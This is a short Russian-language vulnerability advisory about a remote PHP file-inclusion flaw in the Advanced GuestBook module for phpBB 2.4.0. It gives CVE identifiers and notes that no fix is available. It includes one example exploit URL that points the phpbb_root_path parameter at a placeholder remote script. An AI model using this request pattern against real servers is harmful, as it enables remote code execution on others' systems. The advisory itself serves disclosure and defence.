PHP-инклюдинг в phpBB Advanced GuestBook

Дата публикации:
03.05.2006
Дата изменения:
17.10.2006
Всего просмотров:
35692
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-2152
CVE-2006-7076
CVE-2006-7077
Вектор эксплуатации:
Удаленная
Воздействие:
Неавторизованное изменение данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Advanced Guestbook 2.x (модуль к phpBB)
Уязвимые версии: Advanced GuestBook (модуль для phpBB) 2.4.0, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценарии admin/addentry.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://[url]/[phpbb_path]/admin/addentry.php?phpbb_root_path=http://[badscript]?

URL производителя: http://www.phpbb2hacks.de/dload.php?action=file&file_id=153

Решение: Способов устранения уязвимости не существует в настоящее время.

или введите имя

CAPTCHA
californiafreedom
05-03-2016 13:07:37
It is similar to it.
0 |
OhioGrown
05-03-2016 13:33:58
It is simply ridiculous.
0 |